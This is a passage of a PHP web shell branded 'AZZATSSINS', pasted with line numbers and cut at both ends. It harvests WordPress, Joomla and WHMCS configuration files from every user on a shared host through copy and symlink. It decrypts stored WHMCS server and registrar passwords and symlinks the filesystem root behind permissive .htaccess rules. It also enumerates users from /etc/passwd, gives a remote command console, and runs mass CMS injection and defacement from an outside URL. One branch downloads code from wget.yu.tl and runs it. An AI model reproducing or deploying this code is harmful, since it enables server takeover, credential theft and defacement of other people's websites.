2190. copy('/home/'.$user.'/public_html/beta/wp-config.php',$user.' <~ WORDPRESS.txt');
2191. copy('/home/'.$user.'/public_html/portal/wp-config.php',$user.' <~ WORDPRESS.txt');
2192. copy('/home/'.$user.'/public_html/site/wp-config.php',$user.' <~ WORDPRESS.txt');
2193. copy('/home/'.$user.'/public_html/wp/wp-config.php',$user.' <~ WORDPRESS.txt');
2194. copy('/home/'.$user.'/public_html/WP/wp-config.php',$user.' <~ WORDPRESS.txt');
2195. copy('/home/'.$user.'/public_html/news/wp-config.php',$user.' <~ WORDPRESS.txt');
2196. copy('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.' <~ WORDPRESS.txt');
2197. copy('/home/'.$user.'/public_html/test/wp-config.php',$user.' <~ WORDPRESS.txt');
2198. copy('/home/'.$user.'/public_html/demo/wp-config.php',$user.' <~ WORDPRESS.txt');
2199. copy('/home/'.$user.'/public_html/home/wp-config.php',$user.' <~ WORDPRESS.txt');
2200. copy('/home/'.$user.'/public_html/v1/wp-config.php',$user.' <~ WORDPRESS.txt');
2201. copy('/home/'.$user.'/public_html/v2/wp-config.php',$user.' <~ WORDPRESS.txt');
2202. copy('/home/'.$user.'/public_html/press/wp-config.php',$user.' <~ WORDPRESS.txt');
2203. copy('/home/'.$user.'/public_html/new/wp-config.php',$user.' <~ WORDPRESS.txt');
2204. copy('/home/'.$user.'/public_html/blogs/wp-config.php',$user.' <~ WORDPRESS.txt');
2205. copy('/home/'.$user.'/public_html/blog/configuration.php',$user.' <~ JOOMLA.txt');
2206. copy('/home/'.$user.'/public_html/submitticket.php',$user.' <~ WHMCS.txt');
2207. copy('/home/'.$user.'/public_html/cms/configuration.php',$user.' <~ JOOMLA.txt');
2208. copy('/home/'.$user.'/public_html/beta/configuration.php',$user.' <~ JOOMLA.txt');
2209. copy('/home/'.$user.'/public_html/portal/configuration.php',$user.' <~ JOOMLA.txt');
2210. copy('/home/'.$user.'/public_html/site/configuration.php',$user.' <~ JOOMLA.txt');
2211. copy('/home/'.$user.'/public_html/main/configuration.php',$user.' <~ JOOMLA.txt');
2212. copy('/home/'.$user.'/public_html/home/configuration.php',$user.' <~ JOOMLA.txt');
2213. copy('/home/'.$user.'/public_html/demo/configuration.php',$user.' <~ JOOMLA.txt');
2214. copy('/home/'.$user.'/public_html/test/configuration.php',$user.' <~ JOOMLA.txt');
2215. copy('/home/'.$user.'/public_html/v1/configuration.php',$user.' <~ JOOMLA.txt');
2216. copy('/home/'.$user.'/public_html/v2/configuration.php',$user.' <~ JOOMLA.txt');
2217. copy('/home/'.$user.'/public_html/joomla/configuration.php',$user.' <~ JOOMLA.txt');
2218. copy('/home/'.$user.'/public_html/new/configuration.php',$user.' <~ JOOMLA.txt');
2219. symlink('/home/'.$user.'/public_html/wp/test/wp-config.php',$user.' <~ WORDPRESS.txt');
2220. symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.' <~ WORDPRESS.txt');
2221. symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.' <~ WORDPRESS.txt');
2222. symlink('/home/'.$user.'/public_html/portal/wp-config.php',$user.' <~ WORDPRESS.txt');
2223. symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.' <~ WORDPRESS.txt');
2224. symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.' <~ WORDPRESS.txt');
2225. symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.' <~ WORDPRESS.txt');
2226. symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.' <~ WORDPRESS.txt');
2227. symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.' <~ WORDPRESS.txt');
2228. symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.' <~ WORDPRESS.txt');
2229. symlink('/home/'.$user.'/public_html/demo/wp-config.php',$user.' <~ WORDPRESS.txt');
2230. symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.' <~ WORDPRESS.txt');
2231. symlink('/home/'.$user.'/public_html/v1/wp-config.php',$user.' <~ WORDPRESS.txt');
2232. symlink('/home/'.$user.'/public_html/v2/wp-config.php',$user.' <~ WORDPRESS.txt');
2233. symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.' <~ WORDPRESS.txt');
2234. symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.' <~ WORDPRESS.txt');
2235. symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.' <~ WORDPRESS.txt');
2236. /*You Can ReCoded But Don't Change ©CopyRight*/
2237. /*e.g: Recoded By xxxxxx & © AZZATSSINS*/
2238. symlink('/home/'.$user.'/public_html/blog/configuration.php',$user.' <~ JOOMLA.txt');
2239. symlink('/home/'.$user.'/public_html/submitticket.php',$user.' <~ WHMCS.txt');
2240. symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.' <~ JOOMLA.txt');
2241. symlink('/home/'.$user.'/public_html/beta/configuration.php',$user.' <~ JOOMLA.txt');
2242. symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.' <~ JOOMLA.txt');
2243. symlink('/home/'.$user.'/public_html/site/configuration.php',$user.' <~ JOOMLA.txt');
2244. symlink('/home/'.$user.'/public_html/main/configuration.php',$user.' <~ JOOMLA.txt');
2245. symlink('/home/'.$user.'/public_html/home/configuration.php',$user.' <~ JOOMLA.txt');
2246. symlink('/home/'.$user.'/public_html/demo/configuration.php',$user.' <~ JOOMLA.txt');
2247. symlink('/home/'.$user.'/public_html/test/configuration.php',$user.' <~ JOOMLA.txt');
2248. symlink('/home/'.$user.'/public_html/v1/configuration.php',$user.' <~ JOOMLA.txt');
2249. symlink('/home/'.$user.'/public_html/v2/configuration.php',$user.' <~ JOOMLA.txt');
2250. symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.' <~ JOOMLA.txt');
2251. symlink('/home/'.$user.'/public_html/new/configuration.php',$user.' <~ JOOMLA.txt');
2252. }
2253. echo '<center><i><b><a href='.$folfig.'>CLICK IN HERE TO VIEW CONFIGS</a></b></i></center>';
2254. }
2255. }
2256. elseif(isset($_GET['whmcs']) && ($_GET['whmcs'] == 'decode'))
2257. {  
2258. ?>
2259. <form action="?whmcs=decode" method="post">
2260.  
2261. <?php
2262.  
2263. function decrypt ($string,$cc_encryption_hash)
2264. {
2265.     $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
2266.     $hash_key = _hash ($key);
2267.     $hash_length = strlen ($hash_key);
2268.     $string = base64_decode ($string);
2269.     $tmp_iv = substr ($string, 0, $hash_length);
2270.     $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
2271.     $iv = $out = '';
2272.     $c = 0;
2273.     while ($c < $hash_length)
2274.     {
2275.         $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
2276.         ++$c;
2277.     }
2278.     $key = $iv;
2279.     $c = 0;
2280.     while ($c < strlen ($string))
2281.     {
2282.         if (($c != 0 AND $c % $hash_length == 0))
2283.         {
2284.             $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
2285.         }
2286.         $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
2287.         ++$c;
2288.     }
2289.     return $out;
2290. }
2291.  
2292. function _hash ($string)
2293. {
2294.     if (function_exists ('sha1'))
2295.     {
2296.         $hash = sha1 ($string);
2297.     }
2298.     else
2299.     {
2300.         $hash = md5 ($string);
2301.     }
2302.     $out = '';
2303.     $c = 0;
2304.     while ($c < strlen ($hash))
2305.     {
2306.         $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
2307.         $c += 2;
2308.     }
2309.     return $out;
2310. }
2311.  
2312. echo "
2313. <br>
2314.  
2315. <FORM method='post'>
2316. <input type='hidden' name='form_action' value='2'>
2317. <br>
2318. <table class=tabnet style=width:320px;padding:0 1px;>
2319. <tr><th colspan=2>WHMCS DECODER</th></tr>
2320. <tr><td>db_host </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_host' value='localhost'></td></tr>
2321. <tr><td>db_username </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_username' value=''></td></tr>
2322. <tr><td>db_password</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_password' value=''></td></tr>
2323. <tr><td>db_name</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_name' value=''></td></tr>
2324. <tr><td>cc_encryption_hash</td><td><input style='color:#FF0000;background-color:' type='text' class='inputz' size='38' name='cc_encryption_hash' value=''></td></tr>
2325. <td>&nbsp;&nbsp;&nbsp;&nbsp;<INPUT class='inputzbut' type='submit' style='color:#FF0000;background-color:'  value='Submit' name='Submit'></td>
2326. </table>
2327. </FORM>
2328. </center>
2329. ";
2330.  
2331.  if($_POST['form_action'] == 2 )
2332.  {
2333.  //include($file);
2334.  $db_host=($_POST['db_host']);
2335.  $db_username=($_POST['db_username']);
2336.  $db_password=($_POST['db_password']);
2337.  $db_name=($_POST['db_name']);
2338.  $cc_encryption_hash=($_POST['cc_encryption_hash']);
2339.  
2340.  
2341.  
2342.     $link=mysql_connect($db_host,$db_username,$db_password) ;
2343.         mysql_select_db($db_name,$link) ;
2344. $query = mysql_query("SELECT * FROM tblservers");
2345. while($v = mysql_fetch_array($query)) {
2346. $ipaddress = $v['ipaddress'];
2347. $username = $v['username'];
2348. $type = $v['type'];
2349. $active = $v['active'];
2350. $hostname = $v['hostname'];
2351. echo("<center><table border='1'>");
2352. $password = decrypt ($v['password'], $cc_encryption_hash);
2353. echo("<tr><td>Type</td><td>$type</td></tr>");
2354. echo("<tr><td>Active</td><td>$active</td></tr>");
2355. echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
2356. echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
2357. echo("<tr><td>Username</td><td>$username</td></tr>");
2358. echo("<tr><td>Password</td><td>$password</td></tr>");
2359.  
2360. echo "</table><br><br></center>";
2361. }
2362.  
2363.     $link=mysql_connect($db_host,$db_username,$db_password) ;
2364.         mysql_select_db($db_name,$link) ;
2365. $query = mysql_query("SELECT * FROM tblregistrars");
2366. echo("<center>Domain Reseller <br><table class=tabnet border='1'>");
2367. echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
2368. while($v = mysql_fetch_array($query)) {
2369. $registrar     = $v['registrar'];
2370. $setting = $v['setting'];
2371. $value = decrypt ($v['value'], $cc_encryption_hash);
2372. if ($value=="") {
2373. $value=0;
2374. }
2375. $password = decrypt ($v['password'], $cc_encryption_hash);
2376. echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");
2377. }
2378. }
2379. }
2380. if($_GET['sym']=="link"){
2381. @session_start();
2382. @set_time_limit(0);
2383. @ini_set('max_execution_time',0);
2384. @mkdir('xazs',0777);
2385. $sempak  = "Options all \n
2386. DirectoryIndex azzatssins.html \n
2387. AddType text/plain .php \n
2388. AddHandler server-parsed .php \n  
2389. AddType text/plain .html \n
2390. AddHandler txt .html \n
2391. Require None \n
2392. Satisfy Any";
2393. $masuk =@fopen ('xazs/.htaccess','w');
2394. fwrite($masuk ,$sempak);
2395. @symlink('/','xazs/azzatssins.txt');  
2396. $pg = basename(__FILE__);
2397.  
2398.  
2399. if(is_readable("/var/named")){
2400. echo '<table align="center" border="3" width="400" cellspacing="0" cellpadding="0">
2401. <td align="center"> <font color="white"> <b>DOMAINS</b></td>
2402. <td align="center"> <font color="white"> <b>USERS</b></td>
2403. <td align="center"> <font color="white"> <b>SYMLINK</b></center></td>';
2404. $list = scandir("/var/named");
2405. foreach($list as $domain){
2406. if(strpos($domain,".db")){
2407. @error_reporting(0);
2408. @ini_set('log_errors',0);
2409. @ini_set('error_log',NULL);
2410.  
2411. $i += 1;
2412. $domain = str_replace('.db','',$domain);
2413. $owner = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
2414. echo "<tr>
2415. <td><a class='azzatssins' href='http://".$domain." '>".$domain."</a></td>
2416. <td align='center'><font color='white'>".$owner['name']."</td>
2417. <td align='center'><a href='xazs/azzatssins.txt".$owner['dir']."/public_html/' target='_blank'>Symlink</a></td>";
2418. }
2419. }
2420. flush();
2421. flush();
2422. }
2423. echo "</tr></table></div></html>";
2424.  
2425. }
2426. if($_GET['jumping']=="user"){
2427. error_reporting(0);
2428. echo '<center><h2><u>Just View Directory Another User, Readable or Not</u></h2><br><hr><br>List of Readable<br><hr><br></center><table align="center" border="3" width="400" cellspacing="0" cellpadding="0">
2429. <td align="center"> <font color="violet"> <b>USERS PATH</b></td>
2430. <td align="center"> <font color="violet"> <b>DOMAINS</b></td>
2431.  
2432. ';
2433. //$us = file_get_contents("/etc/passwd");
2434. $usa = fopen('/etc/passwd','r');
2435. $dir = mkdir('jump', 0777);
2436. $rrrr = "Options all \n DirectoryIndex jump \n Require None \n Satisfy Any";
2437. $frr = fopen('jump/.htaccess', 'w');
2438.  
2439. fwrite($frr, $rrrr);
2440. while($us = fgets($usa)){
2441. if($us==""){
2442.     echo "<font color=red><b>Can't read /etc/passwd</b></font><br><br>";
2443. }
2444. else{
2445. preg_match_all('/(.*?):x:/', $us, $user_byk);
2446.  
2447.     foreach($user_byk[1] as $user){
2448.         $dir1 = "/home/$user/public_html/";
2449.         if(is_readable($dir1)){
2450.            echo "<tr>
2451. <td><i><font color=green>$dir1</font></i></td>";
2452.  
2453.       $domainns = file_get_contents("/etc/named.conf");
2454.       if($domainns==""){
2455.         echo "<font color=red><b>Can't read /etc/named.conf</b></font><br><br>";
2456.       }
2457.       else{
2458.  
2459.       preg_match_all("#/var/named/(.*?).db#", $domainns, $domains);
2460.       foreach($domains[1] as $domain){
2461.        
2462.       $user2 = posix_getpwuid(@fileowner("/etc/valiases/$domain"));
2463.       $user2 = $user2['name'];
2464.       if ($user2=="$user"){
2465.         echo "<td><a class='azzatssins' href='http://".$domain." '><font color=lime>".$domain."</font></td>";
2466.         break;
2467.     }
2468.   }
2469.  
2470. }
2471.        }
2472.         else{
2473.            
2474.         }
2475.  
2476.    }
2477.  
2478. }
2479.  
2480. }
2481.  
2482. echo "</tr></table>";
2483.  
2484. }
2485.  
2486. echo '<div id="tbl" class="tbl" style="display:none;">
2487.  
2488. <div class="filetable">
2489.  
2490. <div class="tblcnt" style="width:220px;">Name</div>
2491.  
2492. <div class="tblcnt" style="width:80px;">Size</div>
2493.  
2494. <div class="tblcnt" style="width:100px;">Modify</div>
2495.  
2496. <div class="tblcnt" style="width:100px;">Owner</div>
2497.  
2498. <div class="tblcnt" style="width:100px;">Permission</div>
2499.  
2500. <div class="tblcnt" style="width:80px;">Action</div>
2501.  
2502. </div>
2503.  
2504. <div id="filest"></div>
2505.  
2506. <div style="clear:both;"></div>
2507.  
2508.  
2509.  
2510. </div>
2511.  
2512.  
2513.  
2514. <div id="inject" class="tbl" style="display:none;">
2515.  
2516. <div class="filetable">
2517.  
2518. <div class="tblcnt" style="width:200px; cursor:pointer;" onClick="doSlct();">User</div>
2519.  
2520. <div class="tblcnt" style="width:220px;">Sitename</div>
2521.  
2522. <div class="tblcnt" style="width:160px;">CMS</div>
2523.  
2524. <div class="tblcnt" style="width:120px;">Status</div>
2525.  
2526. </div>
2527.  
2528. <div id="injtbl"></div>
2529.  
2530. <div style="clear:both;"></div>
2531.  
2532.  
2533.  
2534. </div>
2535.  
2536.  
2537.  
2538. <div id="infobox" style="display:none;"><div class="infotitle"><a href="" onclick="$(\'#infobox\').hide();return false;" style="color:black;">[-]</a> <span id="infotitle">Information</span></div><div class="infotxt" id="infotxt"></div></div>
2539.  
2540. <script>
2541.  
2542.  
2543.  
2544. var sidebar = false;
2545.  
2546. var sidebar2 = false;
2547.  
2548. function sidebarz(){
2549.  
2550. $(\'#logo\').hide();
2551.  
2552. if(sidebar){
2553.  
2554. $(\'#smnu\').hide();
2555.  
2556. sidebar = false;
2557.  
2558. }else{
2559.  
2560. $(\'#smnu\').show();
2561.  
2562. sidebar = true;
2563.  
2564. }
2565.  
2566. }
2567.  
2568. function sidebarz2(){
2569.  
2570. if(sidebar2){
2571.  
2572. $(\'#smnu2\').hide();
2573.  
2574. sidebar2 = false;
2575.  
2576. }else{
2577.  
2578. $(\'#smnu2\').show();
2579.  
2580. sidebar2 = true;
2581.  
2582. }
2583.  
2584. }
2585.  
2586.  
2587.  
2588. function filebrs(val){
2589.  
2590. hideAll();
2591.  
2592. $(\'#status\').html(\'Status: Requesting...\');
2593.  
2594. $.post("", { ac: "browse", path: val},
2595.  
2596. function(data) {
2597.  
2598. $(\'#tbl\').show();
2599.  
2600. $(\'#status\').html(\'Status: Completed (:\');
2601.  
2602. $(\'#filest\').html(data);
2603.  
2604. });
2605.  
2606. }
2607.  
2608. function doUpdt(val){
2609.  
2610. var refreshId = setInterval(function() {
2611.  
2612.      $("#injtbl").load(\'rootinject.tmp\');
2613.  
2614.   }, 5000);
2615.  
2616.   $.ajaxSetup({ cache: false });
2617.  
2618.  
2619.  
2620. hideAll();
2621.  
2622. $(\'#inject\').show();
2623.  
2624. $(\'#status\').html(\'Status: Requesting...\');
2625.  
2626. $.post("", { ac: val},
2627.  
2628. function(data) {
2629.  
2630. refreshId = "";
2631.  
2632. $(\'#sidebar2\').show();
2633.  
2634. $(\'#status\').html(\'Status: Completed (:\');
2635.  
2636. $(\'#injtbl\').html(data);
2637.  
2638. });
2639.  
2640.  
2641.  
2642. }
2643.  
2644.  
2645.  
2646. function hideAll(){
2647.  
2648. k1 = 0;
2649.  
2650. k2 = 0;
2651.  
2652. $(\'#sidebar2\').hide();
2653.  
2654. $(\'#tbl\').hide();
2655.  
2656. $(\'#inject\').hide();
2657.  
2658. $(\'#infobox\').hide();
2659.  
2660. $(\'#sshbox\').hide();
2661.  
2662. }
2663.  
2664.  
2665.  
2666. function doReq(val){
2667.  
2668. hideAll();
2669.  
2670. $(\'#inject\').show();
2671.  
2672. $(\'#status\').html(\'Status: Requesting...\');
2673.  
2674. $.post("", { ac: val},
2675.  
2676. function(data) {
2677.  
2678. $(\'#sidebar2\').show();
2679.  
2680. $(\'#status\').html(\'Status: Completed (:\');
2681.  
2682. $(\'#injtbl\').html(data);
2683.  
2684. });
2685.  
2686. }
2687.  
2688.  
2689.  
2690. function doReq2(val){
2691.  
2692. hideAll();
2693.  
2694. $(\'#status\').html(\'Status: Requesting...\');
2695.  
2696. $.post("", { ac: val},
2697.  
2698. function(data) {
2699.  
2700. $(\'#infobox\').show();
2701.  
2702. $(\'#status\').html(\'Status: Completed (:\');
2703.  
2704. $(\'#infotxt\').html(data);
2705.  
2706. });
2707.  
2708. }
2709.  
2710.  
2711.  
2712. //Js Multi thread post request by Elo (:
2713.  
2714. var k1 = 1; var k2 = 0; var req_limit = 9;
2715.  
2716. function doInject(){
2717.  
2718. var i = 0; var j = 0;
2719.  
2720. $(\'.conf\').each(function(){
2721.  
2722. i += 1;
2723.  
2724. var id = $(this).attr(\'title\');
2725.  
2726.  
2727.  
2728. if(id > k1){
2729.  
2730. j += 1; k1 += 1;
2731.  
2732. var link = $(this).attr(\'href\');
2733.  
2734.  
2735.  
2736. var domain = $(\'#inj_dom\' + id).html();
2737.  
2738. var cms = $(this).html();
2739.  
2740. doPost2(link,cms,id,domain);
2741.  
2742. }
2743.  
2744. if(j > req_limit){return false;}
2745.  
2746.  
2747.  
2748.  
2749.  
2750. });
2751.  
2752. }
2753.  
2754.  
2755.  
2756.  
2757.  
2758.  
2759.  
2760. function doPost2(link,cmz,id,dmn){
2761.  
2762. if($(\'#injchk\'+id).is(\':checked\')){
2763.  
2764. $(\'#inj_status\' + id).html(\'Injecting...\');
2765.  
2766. $.ajax({
2767.  
2768.  url: "",
2769.  
2770.  type: "POST",
2771.  
2772.  timeout: 60000,
2773.  
2774.  data: {ac: "inject", conf: link, domain: dmn, cms: cmz, ignore_def: $(\'#ignore_def:checked\').val(), n404_php: $(\'#404_php:checked\').val(), nindex_php: $(\'#index_php:checked\').val(), nhome_php: $(\'#home_php:checked\').val(), narchive_php: $(\'#archive_php:checked\').val(), ncomment_php: $(\'#comment_php:checked\').val(), com_install: $(\'#use_com:checked\').val(), deface_page: $(\'#deface_page\').val()},
2775.  
2776.  dataType: "text"
2777.  
2778. }).done(function(msg) {
2779.  
2780.  
2781.  
2782. k2 += 1;
2783.  
2784.  
2785.  
2786. $(\'#inj_status\' + id).html(\'Parse Error\');
2787.  
2788. $(\'#inj_status\' + id).css({"background-color" : "red", "color" : "white"});
2789.  
2790. var res_data = JSON.parse(msg);
2791.  
2792.  
2793.  
2794. if(res_data.status == "success"){
2795.  
2796. $(\'#inj_domain\' + id).html(\'<a class="injwork" href="\' + res_data.site + \'">\' + res_data.site + \'</a>\');
2797.  
2798. $(\'#inj_status\' + id).css({"background-color" : "green", "color" : "white"});
2799.  
2800. $(\'#inj_status\' + id).html(\'Success\');
2801.  
2802. $(\'#injst\' + id).removeClass("conf");
2803.  
2804.  
2805.  
2806. }
2807.  
2808. else{
2809.  
2810. if(res_data.status == "error"){
2811.  
2812. $(\'#inj_status\' + id).css({"background-color" : "red", "color" : "white"});
2813.  
2814. $(\'#inj_status\' + id).html(res_data.msg);
2815.  
2816. $(\'#inj_status\' + id).addClass("injerror");
2817.  
2818. $(\'#injst\' + id).removeClass("conf");
2819.  
2820. }else{
2821.  
2822. $(\'#inj_status\' + id).addClass("injerror");
2823.  
2824. $(\'#inj_status\' + id).html(\'Unknown\');
2825.  
2826. $(\'#injst\' + id).removeClass("conf");
2827.  
2828. }
2829.  
2830. }
2831.  
2832. updateInjSts(k2);
2833.  
2834. if(k1 == k2){doInject();}
2835.  
2836. }).fail(function(jqXHR, textStatus) {
2837.  
2838. k2 += 1;
2839.  
2840. $(\'#inj_status\' + id).css({"background-color" : "black", "color" : "white"});
2841.  
2842. $(\'#inj_status\' + id).html(\'Timeout\');
2843.  
2844. updateInjSts(k2);
2845.  
2846. if(k1 == k2){doInject();}
2847.  
2848. });
2849.  
2850.  
2851.  
2852. }else{
2853.  
2854. k2 += 1;
2855.  
2856. updateInjSts(k2);
2857.  
2858. if(k1 == k2){doInject();}
2859.  
2860. }
2861.  
2862. }
2863.  
2864. //Js Multi thread post request by Elo (:
2865.  
2866. function updateInjSts(k){
2867.  
2868. var tc = $(\'#sitecount\').val();
2869.  
2870. if(tc > k){
2871.  
2872. $(\'#status\').html("Status: " + k + "/" + tc + " Injected");
2873.  
2874. }else{
2875.  
2876. $(\'#status\').html("Status: Injection Complete (:");
2877.  
2878. }
2879.  
2880. }
2881.  
2882.  
2883.  
2884. function rmvErr(){
2885.  
2886. $(\'.injerror\').each(function(){
2887.  
2888. var nano = $(this).parent();
2889.  
2890. $(nano).remove();
2891.  
2892. });
2893.  
2894. }
2895.  
2896.  
2897.  
2898. function rmvSlct(){
2899.  
2900. $(\'.conf\').each(function(){
2901.  
2902. var id = $(this).attr(\'title\');
2903.  
2904. if($(\'#injchk\'+id).is(\':checked\')){
2905.  
2906. $(\'#inj\' + id).remove();
2907.  
2908. }
2909.  
2910. });
2911.  
2912. }
2913.  
2914.  
2915.  
2916. function retryTimeout(){
2917.  
2918. k1 = 1; k2 = 0;
2919.  
2920. doInject();
2921.  
2922. }
2923.  
2924.  
2925.  
2926. function doSlct(){
2927.  
2928. $(\'.conf\').each(function(){
2929.  
2930. var id = $(this).attr(\'title\');
2931.  
2932. doToggle(id);
2933.  
2934. });
2935.  
2936. }
2937.  
2938.  
2939.  
2940. function doToggle(dd){
2941.  
2942. if($(\'#injchk\'+dd).is(\':checked\')){
2943.  
2944. $(\'#injc\'+dd).css(\'background-color\',\'red\');
2945.  
2946. $(\'#injchk\'+dd).attr(\'checked\',false);
2947.  
2948. }else{
2949.  
2950. $(\'#injc\'+dd).css(\'background-color\',\'#76BBEB\');
2951.  
2952. $(\'#injchk\'+dd).attr(\'checked\',true);
2953.  
2954. }
2955.  
2956. }
2957.  
2958.  
2959.  
2960. function doSSH(){
2961.  
2962. $(\'#status\').html("Status: Requesting...");
2963.  
2964. var cmd = $(\'#sshcmd\').val();
2965.  
2966. $(\'#sshcmd\').val("");
2967.  
2968. $.post("", { ac: "ssh",command: cmd},
2969.  
2970. function(data) {
2971.  
2972. $(\'#sshoutput\').append("[azzatssins@localhost~]# <br />"+data+"<br />");
2973.  
2974. $(\'#status\').html("Status: Done.");
2975.  
2976. });
2977.  
2978. }
2979.  
2980. </script>
2981.  
2982.  
2983.  
2984. <div class="sshbox" id="sshbox">
2985.  
2986. <br />
2987.  
2988. <div id="sshoutput"></div>
2989.  
2990. [azzatssins@localhost~]# <input onkeydown="if (event.keyCode == 13) doSSH();" type="text" id="sshcmd">
2991.  
2992. </div>
2993.  
2994.  
2995.  
2996. <div id="sidebar" class="sidebar">
2997.  
2998.  
2999.  
3000. <div class="smnu" id="smnu" class="smnu">
3001.  
3002. &raquo; <a href="" onClick="$(\'#infobox\').show();$(\'#infotitle\').html(\'Security Information\');doReq2(\'secinfo\');return false;">SECURITY VULNERABILITY</a></br>
3003.  
3004. &raquo; <a href="" onClick="$(\'#infobox\').show();$(\'#infotitle\').html(\'System Information\');doReq2(\'sysinfo\');return false;">SYSTEM INFO</a></br>
3005.  
3006. &raquo; <a href="" onClick="$(\'#infotitle\').html(\'PHP Info\');doReq2(\'phpinfo\');return false;">PHP INFO</a></br>
3007.  
3008. &raquo; <a href="" onClick="filebrs(\'\'); return false;">FILE BROWSER</a></br>
3009.  
3010. &raquo; <a href="" onClick="$(\'#infotitle\').html(\'Scanned Domains\');doReq2(\'chknamed\');return false;">GET ALL DOMAINS</a></br>
3011.  
3012. &raquo; <a href="" onClick="doReq(\'chkph\');return false;">CMS DETECTOR [Simple]</a></br>
3013.  
3014. &raquo; <a href="" onClick="$(\'#inject\').show();doUpdt(\'chkph2\');return false;">CMS DETECTOR [Root]</a></br>
3015.  
3016. &raquo; <a href="" onClick="doReq2(\'safebypass\');return false;">BYPASS FUNCTIONS</a></br>
3017.  
3018. &raquo; <a href="" onClick="hideAll(); $(\'#sshbox\').show(); return false;">COMMAND CONSOLE</a></br>
3019.  
3020. &raquo; <a href=?symbolic=link>SYMBOLIC</a> <a href=?sym=link>LINK</a></br>
3021.  
3022. &raquo; <a href=?jumping=user>JUMPING USER</a></br>
3023.  
3024. &raquo; <a href=?config=grabber>CONFIGS GRABBER</a></br>
3025.  
3026. &raquo; <a href=?file=uploader>UPLOAD FILE</a></br>
3027.  
3028. &raquo; <a href=?whmcs=decode>WHMCS DECODE</a></br>
3029.  
3030. &raquo; <a href=?mysql=connect>MYSQL CONNECT</a></br>
3031.  
3032.  
3033.  
3034. </div>
3035.  
3036. <div class="stitle" onClick="sidebarz();">[+]</br>A</br>Z</br>Z</br>A</br>T</br>S</br>S</br>I</br>N</br>.</br>S</br>[+]</div>
3037.  
3038. </div>
3039.  
3040.  
3041.  
3042. <div id="sidebar2" class="sidebar" style="display:none;right:1px;left:auto;">
3043.  
3044. <div class="smnu" style="float:right;" id="smnu2" class="smnu">
3045.  
3046. <div id="injmain">
3047.  
3048. &raquo; <a href="" onClick="doInject(); return false;">Start Injecting</a></br>
3049.  
3050. &raquo; <a href="" onClick="">Export</a></br>
3051.  
3052. &raquo; <a href="" onClick="rmvErr(); return false;">Remove Error</a></br>
3053.  
3054. &raquo; <a href="" onClick="rmvSlct(); return false;">Remove Selected</a></br>
3055.  
3056. &raquo; <a href="" onClick="retryTimeout(); return false;">Retry timeout</a></br>
3057.  
3058. &raquo; <a href="" onClick="alert(\'Do It Manually :p\'); return false;">Submit to Zone-H</a></br>
3059.  
3060. &raquo; <a href="" onClick="$(\'#injmain\').hide(); $(\'#inj2nd\').show(); return false;">Settings</a></br>
3061.  
3062. </div>
3063.  
3064. <div id="inj2nd" style="display:none;">
3065.  
3066. <div class="rbox">
3067.  
3068.  
3069.  
3070. <div style="clear:both;"></div>
3071.  
3072. <center><u>WordPress</u></center><br>
3073.  
3074. <input type="checkbox" name="404_php" id="404_php" checked>404.php<br />
3075.  
3076. <input type="checkbox" name="archive_php" id="archive_php" checked>archive.php<br />
3077.  
3078. <input type="checkbox" name="index_php" id="index_php" checked>index.php<br />
3079.  
3080. <input type="checkbox" name="home_php" id="home_php" checked>home.php<br />
3081.  
3082. <input type="checkbox" name="comment_php" id="comment_php" checked>comment.php<br /><br /><br />
3083.  
3084. </div>
3085.  
3086.  
3087.  
3088. <div class="rbox">
3089.  
3090. <center><u>Joomla</u></center><br>
3091.  
3092. <input type="checkbox" name="use_com" id="use_com" checked>Use Com Installer<br />
3093.  
3094. <input type="checkbox" id="ignore_def">Ignore Default Templete<br />
3095.  
3096. </div>
3097.  
3098.  
3099.  
3100. <div class="rbox">
3101.  
3102. <center><u>Default</u></center><br>
3103.  
3104. Req/s: <input type="text" class="smit" value="10" onChange="req_limit = $(this).val();"><br />
3105.  
3106. Deface Page Link: <input type="text" class="smit" id="deface_page" value="http://wget.yu.tl/files/lol.css"><br /><br />
3107.  
3108. </div>
3109.  
3110.  
3111.  
3112. <div style="clear:both;"></div><br />
3113.  
3114. <a href="" onClick="$(\'#injmain\').show(); $(\'#inj2nd\').hide(); return false;">Go Back</a>
3115.  
3116. </div>
3117.  
3118.  
3119.  
3120.  
3121.  
3122. </div>
3123.  
3124. <div class="stitle" style="float:right;" onClick="sidebarz2();">A</br>Z</br>Z</br>A</br>T</br>S</br>S</br>I</br>N</br>S</div>
3125.  
3126. </div>
3127.  
3128.  
3129.  
3130. <div style="clear:both;"></div>
3131.  
3132.  
3133.  
3134. </body>
3135.  
3136. </html>';
3137. if($_GET['mysql']=="connect"){
3138. $get = file_get_contents('http://wget.yu.tl/files/mysql.css');
3139. $bwt = fopen('mysql.php', 'w');
3140. fwrite($bwt,$get);
3141. fclose($bwt);
3142. echo'<meta http-equiv="Refresh" content= "0; url=mysql.php">';
